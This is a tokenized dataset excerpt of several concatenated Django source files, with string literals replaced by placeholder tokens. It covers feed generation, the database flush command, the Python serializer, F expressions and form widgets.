'<STR_LIT>' , obj ) , <EOL> ttl = self . 
__get_dynamic_attr ( '<STR_LIT>' , obj ) , <EOL> ** self . feed_extra_kwargs ( obj ) <EOL> ) <EOL> title_tmp = None <EOL> if self . title_template is not None : <EOL> try : <EOL> title_tmp = loader . get_template ( self . title_template ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> description_tmp = None <EOL> if self . description_template is not None : <EOL> try : <EOL> description_tmp = loader . get_template ( self . description_template ) <EOL> except TemplateDoesNotExist : <EOL> pass <EOL> for item in self . __get_dynamic_attr ( '<STR_LIT>' , obj ) : <EOL> if title_tmp is not None : <EOL> title = title_tmp . render ( RequestContext ( request , { '<STR_LIT>' : item , '<STR_LIT>' : current_site } ) ) <EOL> else : <EOL> title = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if description_tmp is not None : <EOL> description = description_tmp . render ( RequestContext ( request , { '<STR_LIT>' : item , '<STR_LIT>' : current_site } ) ) <EOL> else : <EOL> description = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> link = add_domain ( <EOL> current_site . domain , <EOL> self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> request . is_secure ( ) , <EOL> ) <EOL> enc = None <EOL> enc_url = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if enc_url : <EOL> enc = feedgenerator . Enclosure ( <EOL> url = smart_unicode ( enc_url ) , <EOL> length = smart_unicode ( self . __get_dynamic_attr ( '<STR_LIT>' , item ) ) , <EOL> mime_type = smart_unicode ( self . __get_dynamic_attr ( '<STR_LIT>' , item ) ) <EOL> ) <EOL> author_name = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if author_name is not None : <EOL> author_email = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> author_link = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> else : <EOL> author_email = author_link = None <EOL> pubdate = self . __get_dynamic_attr ( '<STR_LIT>' , item ) <EOL> if pubdate and is_naive ( pubdate ) : <EOL> ltz = tzinfo . 
LocalTimezone ( pubdate ) <EOL> pubdate = pubdate . replace ( tzinfo = ltz ) <EOL> feed . add_item ( <EOL> title = title , <EOL> link = link , <EOL> description = description , <EOL> unique_id = self . __get_dynamic_attr ( '<STR_LIT>' , item , link ) , <EOL> enclosure = enc , <EOL> pubdate = pubdate , <EOL> author_name = author_name , <EOL> author_email = author_email , <EOL> author_link = author_link , <EOL> categories = self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> item_copyright = self . __get_dynamic_attr ( '<STR_LIT>' , item ) , <EOL> ** self . item_extra_kwargs ( item ) <EOL> ) <EOL> return feed </s>
<s> from optparse import make_option <EOL> from django . conf import settings <EOL> from django . db import connections , router , transaction , models , DEFAULT_DB_ALIAS <EOL> from django . core . management import call_command <EOL> from django . core . management . base import NoArgsCommand , CommandError <EOL> from django . core . management . color import no_style <EOL> from django . core . management . sql import sql_flush , emit_post_sync_signal <EOL> from django . utils . importlib import import_module <EOL> class Command ( NoArgsCommand ) : <EOL> option_list = NoArgsCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT>' , dest = '<STR_LIT>' , default = True , <EOL> help = '<STR_LIT>' ) , <EOL> make_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , <EOL> default = DEFAULT_DB_ALIAS , help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> help = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def handle_noargs ( self , ** options ) : <EOL> db = options . get ( '<STR_LIT>' ) <EOL> connection = connections [ db ] <EOL> verbosity = int ( options . get ( '<STR_LIT>' ) ) <EOL> interactive = options . get ( '<STR_LIT>' ) <EOL> self . style = no_style ( ) <EOL> for app_name in settings . INSTALLED_APPS : <EOL> try : <EOL> import_module ( '<STR_LIT>' , app_name ) <EOL> except ImportError : <EOL> pass <EOL> sql_list = sql_flush ( self . style , connection , only_django = True ) <EOL> if interactive : <EOL> confirm = raw_input ( """<STR_LIT>""" % connection . settings_dict [ '<STR_LIT>' ] ) <EOL> else : <EOL> confirm = '<STR_LIT:yes>' <EOL> if confirm == '<STR_LIT:yes>' : <EOL> try : <EOL> cursor = connection . cursor ( ) <EOL> for sql in sql_list : <EOL> cursor . execute ( sql ) <EOL> except Exception , e : <EOL> transaction . rollback_unless_managed ( using = db ) <EOL> raise CommandError ( """<STR_LIT>""" % ( connection . settings_dict [ '<STR_LIT>' ] , e ) ) <EOL> transaction . 
commit_unless_managed ( using = db ) <EOL> all_models = [ ] <EOL> for app in models . get_apps ( ) : <EOL> all_models . extend ( [ <EOL> m for m in models . get_models ( app , include_auto_created = True ) <EOL> if router . allow_syncdb ( db , m ) <EOL> ] ) <EOL> emit_post_sync_signal ( set ( all_models ) , verbosity , interactive , db ) <EOL> kwargs = options . copy ( ) <EOL> kwargs [ '<STR_LIT>' ] = db <EOL> call_command ( '<STR_LIT>' , '<STR_LIT>' , ** kwargs ) <EOL> else : <EOL> print "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> from django . core . serializers import base <EOL> from django . db import models , DEFAULT_DB_ALIAS <EOL> from django . utils . encoding import smart_unicode , is_protected_type <EOL> class Serializer ( base . Serializer ) : <EOL> """<STR_LIT>""" <EOL> internal_use_only = True <EOL> def start_serialization ( self ) : <EOL> self . _current = None <EOL> self . objects = [ ] <EOL> def end_serialization ( self ) : <EOL> pass <EOL> def start_object ( self , obj ) : <EOL> self . _current = { } <EOL> def end_object ( self , obj ) : <EOL> self . objects . append ( { <EOL> "<STR_LIT>" : smart_unicode ( obj . _meta ) , <EOL> "<STR_LIT>" : smart_unicode ( obj . _get_pk_val ( ) , strings_only = True ) , <EOL> "<STR_LIT>" : self . _current <EOL> } ) <EOL> self . _current = None <EOL> def handle_field ( self , obj , field ) : <EOL> value = field . _get_val_from_obj ( obj ) <EOL> if is_protected_type ( value ) : <EOL> self . _current [ field . name ] = value <EOL> else : <EOL> self . _current [ field . name ] = field . value_to_string ( obj ) <EOL> def handle_fk_field ( self , obj , field ) : <EOL> if self . use_natural_keys and hasattr ( field . rel . to , '<STR_LIT>' ) : <EOL> related = getattr ( obj , field . name ) <EOL> if related : <EOL> value = related . natural_key ( ) <EOL> else : <EOL> value = None <EOL> else : <EOL> value = getattr ( obj , field . get_attname ( ) ) <EOL> self . _current [ field . name ] = value <EOL> def handle_m2m_field ( self , obj , field ) : <EOL> if field . rel . through . _meta . auto_created : <EOL> if self . use_natural_keys and hasattr ( field . rel . to , '<STR_LIT>' ) : <EOL> m2m_value = lambda value : value . natural_key ( ) <EOL> else : <EOL> m2m_value = lambda value : smart_unicode ( value . _get_pk_val ( ) , strings_only = True ) <EOL> self . _current [ field . name ] = [ m2m_value ( related ) <EOL> for related in getattr ( obj , field . name ) . 
iterator ( ) ] <EOL> def getvalue ( self ) : <EOL> return self . objects <EOL> def Deserializer ( object_list , ** options ) : <EOL> """<STR_LIT>""" <EOL> db = options . pop ( '<STR_LIT>' , DEFAULT_DB_ALIAS ) <EOL> models . get_apps ( ) <EOL> for d in object_list : <EOL> Model = _get_model ( d [ "<STR_LIT>" ] ) <EOL> data = { Model . _meta . pk . attname : Model . _meta . pk . to_python ( d [ "<STR_LIT>" ] ) } <EOL> m2m_data = { } <EOL> for ( field_name , field_value ) in d [ "<STR_LIT>" ] . iteritems ( ) : <EOL> if isinstance ( field_value , str ) : <EOL> field_value = smart_unicode ( field_value , options . get ( "<STR_LIT>" , settings . DEFAULT_CHARSET ) , strings_only = True ) <EOL> field = Model . _meta . get_field ( field_name ) <EOL> if field . rel and isinstance ( field . rel , models . ManyToManyRel ) : <EOL> if hasattr ( field . rel . to . _default_manager , '<STR_LIT>' ) : <EOL> def m2m_convert ( value ) : <EOL> if hasattr ( value , '<STR_LIT>' ) : <EOL> return field . rel . to . _default_manager . db_manager ( db ) . get_by_natural_key ( * value ) . pk <EOL> else : <EOL> return smart_unicode ( field . rel . to . _meta . pk . to_python ( value ) ) <EOL> else : <EOL> m2m_convert = lambda v : smart_unicode ( field . rel . to . _meta . pk . to_python ( v ) ) <EOL> m2m_data [ field . name ] = [ m2m_convert ( pk ) for pk in field_value ] <EOL> elif field . rel and isinstance ( field . rel , models . ManyToOneRel ) : <EOL> if field_value is not None : <EOL> if hasattr ( field . rel . to . _default_manager , '<STR_LIT>' ) : <EOL> if hasattr ( field_value , '<STR_LIT>' ) : <EOL> obj = field . rel . to . _default_manager . db_manager ( db ) . get_by_natural_key ( * field_value ) <EOL> value = getattr ( obj , field . rel . field_name ) <EOL> if field . rel . to . _meta . pk . rel : <EOL> value = value . pk <EOL> else : <EOL> value = field . rel . to . _meta . get_field ( field . rel . field_name ) . to_python ( field_value ) <EOL> data [ field . 
attname ] = value <EOL> else : <EOL> data [ field . attname ] = field . rel . to . _meta . get_field ( field . rel . field_name ) . to_python ( field_value ) <EOL> else : <EOL> data [ field . attname ] = None <EOL> else : <EOL> data [ field . name ] = field . to_python ( field_value ) <EOL> yield base . DeserializedObject ( Model ( ** data ) , m2m_data ) <EOL> def _get_model ( model_identifier ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> Model = models . get_model ( * model_identifier . split ( "<STR_LIT:.>" ) ) <EOL> except TypeError : <EOL> Model = None <EOL> if Model is None : <EOL> raise base . DeserializationError ( u"<STR_LIT>" % model_identifier ) <EOL> return Model </s>
<s> import datetime <EOL> from django . utils import tree <EOL> class ExpressionNode ( tree . Node ) : <EOL> """<STR_LIT>""" <EOL> ADD = '<STR_LIT:+>' <EOL> SUB = '<STR_LIT:->' <EOL> MUL = '<STR_LIT:*>' <EOL> DIV = '<STR_LIT:/>' <EOL> MOD = '<STR_LIT>' <EOL> AND = '<STR_LIT:&>' <EOL> OR = '<STR_LIT:|>' <EOL> def __init__ ( self , children = None , connector = None , negated = False ) : <EOL> if children is not None and len ( children ) > <NUM_LIT:1> and connector is None : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> super ( ExpressionNode , self ) . __init__ ( children , connector , negated ) <EOL> def _combine ( self , other , connector , reversed , node = None ) : <EOL> if isinstance ( other , datetime . timedelta ) : <EOL> return DateModifierNode ( [ self , other ] , connector ) <EOL> if reversed : <EOL> obj = ExpressionNode ( [ other ] , connector ) <EOL> obj . add ( node or self , connector ) <EOL> else : <EOL> obj = node or ExpressionNode ( [ self ] , connector ) <EOL> obj . add ( other , connector ) <EOL> return obj <EOL> def prepare ( self , evaluator , query , allow_joins ) : <EOL> return evaluator . prepare_node ( self , query , allow_joins ) <EOL> def evaluate ( self , evaluator , qn , connection ) : <EOL> return evaluator . evaluate_node ( self , qn , connection ) <EOL> def __add__ ( self , other ) : <EOL> return self . _combine ( other , self . ADD , False ) <EOL> def __sub__ ( self , other ) : <EOL> return self . _combine ( other , self . SUB , False ) <EOL> def __mul__ ( self , other ) : <EOL> return self . _combine ( other , self . MUL , False ) <EOL> def __div__ ( self , other ) : <EOL> return self . _combine ( other , self . DIV , False ) <EOL> def __mod__ ( self , other ) : <EOL> return self . _combine ( other , self . MOD , False ) <EOL> def __and__ ( self , other ) : <EOL> return self . _combine ( other , self . AND , False ) <EOL> def __or__ ( self , other ) : <EOL> return self . _combine ( other , self . 
OR , False ) <EOL> def __radd__ ( self , other ) : <EOL> return self . _combine ( other , self . ADD , True ) <EOL> def __rsub__ ( self , other ) : <EOL> return self . _combine ( other , self . SUB , True ) <EOL> def __rmul__ ( self , other ) : <EOL> return self . _combine ( other , self . MUL , True ) <EOL> def __rdiv__ ( self , other ) : <EOL> return self . _combine ( other , self . DIV , True ) <EOL> def __rmod__ ( self , other ) : <EOL> return self . _combine ( other , self . MOD , True ) <EOL> def __rand__ ( self , other ) : <EOL> return self . _combine ( other , self . AND , True ) <EOL> def __ror__ ( self , other ) : <EOL> return self . _combine ( other , self . OR , True ) <EOL> def prepare_database_save ( self , unused ) : <EOL> return self <EOL> class F ( ExpressionNode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> super ( F , self ) . __init__ ( None , None , False ) <EOL> self . name = name <EOL> def __deepcopy__ ( self , memodict ) : <EOL> obj = super ( F , self ) . __deepcopy__ ( memodict ) <EOL> obj . name = self . name <EOL> return obj <EOL> def prepare ( self , evaluator , query , allow_joins ) : <EOL> return evaluator . prepare_leaf ( self , query , allow_joins ) <EOL> def evaluate ( self , evaluator , qn , connection ) : <EOL> return evaluator . evaluate_leaf ( self , qn , connection ) <EOL> class DateModifierNode ( ExpressionNode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , children , connector , negated = False ) : <EOL> if len ( children ) != <NUM_LIT:2> : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if not isinstance ( children [ <NUM_LIT:1> ] , datetime . timedelta ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if connector not in ( self . ADD , self . SUB ) : <EOL> raise TypeError ( '<STR_LIT>' % connector ) <EOL> super ( DateModifierNode , self ) . __init__ ( children , connector , negated ) <EOL> def evaluate ( self , evaluator , qn , connection ) : <EOL> return evaluator . 
evaluate_date_modifier_node ( self , qn , connection ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import copy <EOL> import datetime <EOL> from itertools import chain <EOL> from urlparse import urljoin <EOL> from django . conf import settings <EOL> from django . forms . util import flatatt , to_current_timezone <EOL> from django . utils . datastructures import MultiValueDict , MergeDict <EOL> from django . utils . html import escape , conditional_escape <EOL> from django . utils . translation import ugettext , ugettext_lazy <EOL> from django . utils . encoding import StrAndUnicode , force_unicode <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils import datetime_safe , formats <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MEDIA_TYPES = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Media ( StrAndUnicode ) : <EOL> def __init__ ( self , media = None , ** kwargs ) : <EOL> if media : <EOL> media_attrs = media . __dict__ <EOL> else : <EOL> media_attrs = kwargs <EOL> self . _css = { } <EOL> self . _js = [ ] <EOL> for name in MEDIA_TYPES : <EOL> getattr ( self , '<STR_LIT>' + name ) ( media_attrs . get ( name , None ) ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self ) : <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( chain ( * [ getattr ( self , '<STR_LIT>' + name ) ( ) for name in MEDIA_TYPES ] ) ) ) <EOL> def render_js ( self ) : <EOL> return [ u'<STR_LIT>' % self . absolute_path ( path ) for path in self . _js ] <EOL> def render_css ( self ) : <EOL> media = self . _css . keys ( ) <EOL> media . sort ( ) <EOL> return chain ( * [ <EOL> [ u'<STR_LIT>' % ( self . absolute_path ( path ) , medium ) <EOL> for path in self . 
_css [ medium ] ] <EOL> for medium in media ] ) <EOL> def absolute_path ( self , path , prefix = None ) : <EOL> if path . startswith ( u'<STR_LIT>' ) or path . startswith ( u'<STR_LIT>' ) or path . startswith ( u'<STR_LIT:/>' ) : <EOL> return path <EOL> if prefix is None : <EOL> if settings . STATIC_URL is None : <EOL> prefix = settings . MEDIA_URL <EOL> else : <EOL> prefix = settings . STATIC_URL <EOL> return urljoin ( prefix , path ) <EOL> def __getitem__ ( self , name ) : <EOL> "<STR_LIT>" <EOL> if name in MEDIA_TYPES : <EOL> return Media ( ** { str ( name ) : getattr ( self , '<STR_LIT:_>' + name ) } ) <EOL> raise KeyError ( '<STR_LIT>' % name ) <EOL> def add_js ( self , data ) : <EOL> if data : <EOL> for path in data : <EOL> if path not in self . _js : <EOL> self . _js . append ( path ) <EOL> def add_css ( self , data ) : <EOL> if data : <EOL> for medium , paths in data . items ( ) : <EOL> for path in paths : <EOL> if not self . _css . get ( medium ) or path not in self . _css [ medium ] : <EOL> self . _css . setdefault ( medium , [ ] ) . append ( path ) <EOL> def __add__ ( self , other ) : <EOL> combined = Media ( ) <EOL> for name in MEDIA_TYPES : <EOL> getattr ( combined , '<STR_LIT>' + name ) ( getattr ( self , '<STR_LIT:_>' + name , None ) ) <EOL> getattr ( combined , '<STR_LIT>' + name ) ( getattr ( other , '<STR_LIT:_>' + name , None ) ) <EOL> return combined <EOL> def media_property ( cls ) : <EOL> def _media ( self ) : <EOL> if hasattr ( super ( cls , self ) , '<STR_LIT>' ) : <EOL> base = super ( cls , self ) . 
media <EOL> else : <EOL> base = Media ( ) <EOL> definition = getattr ( cls , '<STR_LIT>' , None ) <EOL> if definition : <EOL> extend = getattr ( definition , '<STR_LIT>' , True ) <EOL> if extend : <EOL> if extend == True : <EOL> m = base <EOL> else : <EOL> m = Media ( ) <EOL> for medium in extend : <EOL> m = m + base [ medium ] <EOL> return m + Media ( definition ) <EOL> else : <EOL> return Media ( definition ) <EOL> else : <EOL> return base <EOL> return property ( _media ) <EOL> class MediaDefiningClass ( type ) : <EOL> "<STR_LIT>" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> new_class = super ( MediaDefiningClass , cls ) . __new__ ( cls , name , bases , <EOL> attrs ) <EOL> if '<STR_LIT>' not in attrs : <EOL> new_class . media = media_property ( new_class ) <EOL> return new_class <EOL> class SubWidget ( StrAndUnicode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent_widget , name , value , attrs , choices ) : <EOL> self . parent_widget = parent_widget <EOL> self . name , self . value = name , value <EOL> self . attrs , self . choices = attrs , choices <EOL> def __unicode__ ( self ) : <EOL> args = [ self . name , self . value , self . attrs ] <EOL> if self . choices : <EOL> args . append ( self . choices ) <EOL> return self . parent_widget . render ( * args ) <EOL> class Widget ( object ) : <EOL> __metaclass__ = MediaDefiningClass <EOL> is_hidden = False <EOL> needs_multipart_form = False <EOL> is_localized = False <EOL> is_required = False <EOL> def __init__ ( self , attrs = None ) : <EOL> if attrs is not None : <EOL> self . attrs = attrs . copy ( ) <EOL> else : <EOL> self . attrs = { } <EOL> def __deepcopy__ ( self , memo ) : <EOL> obj = copy . copy ( self ) <EOL> obj . attrs = self . attrs . 
copy ( ) <EOL> memo [ id ( self ) ] = obj <EOL> return obj <EOL> def subwidgets ( self , name , value , attrs = None , choices = ( ) ) : <EOL> """<STR_LIT>""" <EOL> yield SubWidget ( self , name , value , attrs , choices ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def build_attrs ( self , extra_attrs = None , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> attrs = dict ( self . attrs , ** kwargs ) <EOL> if extra_attrs : <EOL> attrs . update ( extra_attrs ) <EOL> return attrs <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> """<STR_LIT>""" <EOL> return data . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> """<STR_LIT>""" <EOL> if data is None : <EOL> data_value = u'<STR_LIT>' <EOL> else : <EOL> data_value = data <EOL> if initial is None : <EOL> initial_value = u'<STR_LIT>' <EOL> else : <EOL> initial_value = initial <EOL> if force_unicode ( initial_value ) != force_unicode ( data_value ) : <EOL> return True <EOL> return False <EOL> def id_for_label ( self , id_ ) : <EOL> """<STR_LIT>""" <EOL> return id_ <EOL> class Input ( Widget ) : <EOL> """<STR_LIT>""" <EOL> input_type = None <EOL> def _format_value ( self , value ) : <EOL> if self . is_localized : <EOL> return formats . localize_input ( value ) <EOL> return value <EOL> def render ( self , name , value , attrs = None ) : <EOL> if value is None : <EOL> value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , type = self . input_type , name = name ) <EOL> if value != '<STR_LIT>' : <EOL> final_attrs [ '<STR_LIT:value>' ] = force_unicode ( self . _format_value ( value ) ) <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> class TextInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> class PasswordInput ( Input ) : <EOL> input_type = '<STR_LIT:password>' <EOL> def __init__ ( self , attrs = None , render_value = False ) : <EOL> super ( PasswordInput , self ) . 
__init__ ( attrs ) <EOL> self . render_value = render_value <EOL> def render ( self , name , value , attrs = None ) : <EOL> if not self . render_value : value = None <EOL> return super ( PasswordInput , self ) . render ( name , value , attrs ) <EOL> class HiddenInput ( Input ) : <EOL> input_type = '<STR_LIT>' <EOL> is_hidden = True <EOL> class MultipleHiddenInput ( HiddenInput ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None , choices = ( ) ) : <EOL> super ( MultipleHiddenInput , self ) . __init__ ( attrs ) <EOL> self . choices = choices <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> final_attrs = self . build_attrs ( attrs , type = self . input_type , name = name ) <EOL> id_ = final_attrs . get ( '<STR_LIT:id>' , None ) <EOL> inputs = [ ] <EOL> for i , v in enumerate ( value ) : <EOL> input_attrs = dict ( value = force_unicode ( v ) , ** final_attrs ) <EOL> if id_ : <EOL> input_attrs [ '<STR_LIT:id>' ] = '<STR_LIT>' % ( id_ , i ) <EOL> inputs . append ( u'<STR_LIT>' % flatatt ( input_attrs ) ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( inputs ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if isinstance ( data , ( MultiValueDict , MergeDict ) ) : <EOL> return data . getlist ( name ) <EOL> return data . get ( name , None ) <EOL> class FileInput ( Input ) : <EOL> input_type = '<STR_LIT:file>' <EOL> needs_multipart_form = True <EOL> def render ( self , name , value , attrs = None ) : <EOL> return super ( FileInput , self ) . render ( name , None , attrs = attrs ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> "<STR_LIT>" <EOL> return files . 
get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if data is None : <EOL> return False <EOL> return True <EOL> FILE_INPUT_CONTRADICTION = object ( ) <EOL> class ClearableFileInput ( FileInput ) : <EOL> initial_text = ugettext_lazy ( '<STR_LIT>' ) <EOL> input_text = ugettext_lazy ( '<STR_LIT>' ) <EOL> clear_checkbox_label = ugettext_lazy ( '<STR_LIT>' ) <EOL> template_with_initial = u'<STR_LIT>' <EOL> template_with_clear = u'<STR_LIT>' <EOL> def clear_checkbox_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return name + '<STR_LIT>' <EOL> def clear_checkbox_id ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return name + '<STR_LIT>' <EOL> def render ( self , name , value , attrs = None ) : <EOL> substitutions = { <EOL> '<STR_LIT>' : self . initial_text , <EOL> '<STR_LIT>' : self . input_text , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . clear_checkbox_label , <EOL> } <EOL> template = u'<STR_LIT>' <EOL> substitutions [ '<STR_LIT:input>' ] = super ( ClearableFileInput , self ) . render ( name , value , attrs ) <EOL> if value and hasattr ( value , "<STR_LIT:url>" ) : <EOL> template = self . template_with_initial <EOL> substitutions [ '<STR_LIT>' ] = ( u'<STR_LIT>' <EOL> % ( escape ( value . url ) , <EOL> escape ( force_unicode ( value ) ) ) ) <EOL> if not self . is_required : <EOL> checkbox_name = self . clear_checkbox_name ( name ) <EOL> checkbox_id = self . clear_checkbox_id ( checkbox_name ) <EOL> substitutions [ '<STR_LIT>' ] = conditional_escape ( checkbox_name ) <EOL> substitutions [ '<STR_LIT>' ] = conditional_escape ( checkbox_id ) <EOL> substitutions [ '<STR_LIT>' ] = CheckboxInput ( ) . render ( checkbox_name , False , attrs = { '<STR_LIT:id>' : checkbox_id } ) <EOL> substitutions [ '<STR_LIT>' ] = self . template_with_clear % substitutions <EOL> return mark_safe ( template % substitutions ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> upload = super ( ClearableFileInput , self ) . 
value_from_datadict ( data , files , name ) <EOL> if not self . is_required and CheckboxInput ( ) . value_from_datadict ( <EOL> data , files , self . clear_checkbox_name ( name ) ) : <EOL> if upload : <EOL> return FILE_INPUT_CONTRADICTION <EOL> return False <EOL> return upload <EOL> class Textarea ( Widget ) : <EOL> def __init__ ( self , attrs = None ) : <EOL> default_attrs = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> if attrs : <EOL> default_attrs . update ( attrs ) <EOL> super ( Textarea , self ) . __init__ ( default_attrs ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> return mark_safe ( u'<STR_LIT>' % ( flatatt ( final_attrs ) , <EOL> conditional_escape ( force_unicode ( value ) ) ) ) <EOL> class DateInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( DateInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> self . manual_format = True <EOL> else : <EOL> self . format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . manual_format = False <EOL> def _format_value ( self , value ) : <EOL> if self . is_localized and not self . manual_format : <EOL> return formats . localize_input ( value ) <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value = datetime_safe . new_date ( value ) <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def _has_changed ( self , initial , data ) : <EOL> try : <EOL> input_format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> initial = datetime . datetime . strptime ( initial , input_format ) . date ( ) <EOL> except ( TypeError , ValueError ) : <EOL> pass <EOL> return super ( DateInput , self ) . _has_changed ( self . 
_format_value ( initial ) , data ) <EOL> class DateTimeInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( DateTimeInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> self . manual_format = True <EOL> else : <EOL> self . format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . manual_format = False <EOL> def _format_value ( self , value ) : <EOL> if self . is_localized and not self . manual_format : <EOL> return formats . localize_input ( value ) <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value = datetime_safe . new_datetime ( value ) <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def _has_changed ( self , initial , data ) : <EOL> try : <EOL> input_format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> initial = datetime . datetime . strptime ( initial , input_format ) <EOL> except ( TypeError , ValueError ) : <EOL> pass <EOL> return super ( DateTimeInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class TimeInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( TimeInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> self . manual_format = True <EOL> else : <EOL> self . format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . manual_format = False <EOL> def _format_value ( self , value ) : <EOL> if self . is_localized and not self . manual_format : <EOL> return formats . localize_input ( value ) <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def _has_changed ( self , initial , data ) : <EOL> try : <EOL> input_format = formats . get_format ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> initial = datetime . datetime . strptime ( initial , input_format ) . 
time ( ) <EOL> except ( TypeError , ValueError ) : <EOL> pass <EOL> return super ( TimeInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> def boolean_check ( v ) : <EOL> return not ( v is False or v is None or v == '<STR_LIT>' ) <EOL> class CheckboxInput ( Widget ) : <EOL> def __init__ ( self , attrs = None , check_test = None ) : <EOL> super ( CheckboxInput , self ) . __init__ ( attrs ) <EOL> self . check_test = boolean_check if check_test is None else check_test <EOL> def render ( self , name , value , attrs = None ) : <EOL> final_attrs = self . build_attrs ( attrs , type = '<STR_LIT>' , name = name ) <EOL> try : <EOL> result = self . check_test ( value ) <EOL> except : <EOL> result = False <EOL> if result : <EOL> final_attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not ( value is True or value is False or value is None or value == '<STR_LIT>' ) : <EOL> final_attrs [ '<STR_LIT:value>' ] = force_unicode ( value ) <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if name not in data : <EOL> return False <EOL> value = data . get ( name ) <EOL> values = { '<STR_LIT:true>' : True , '<STR_LIT:false>' : False } <EOL> if isinstance ( value , basestring ) : <EOL> value = values . get ( value . lower ( ) , value ) <EOL> return value <EOL> def _has_changed ( self , initial , data ) : <EOL> return bool ( initial ) != bool ( data ) <EOL> class Select ( Widget ) : <EOL> allow_multiple_selected = False <EOL> def __init__ ( self , attrs = None , choices = ( ) ) : <EOL> super ( Select , self ) . __init__ ( attrs ) <EOL> self . choices = list ( choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' % flatatt ( final_attrs ) ] <EOL> options = self . 
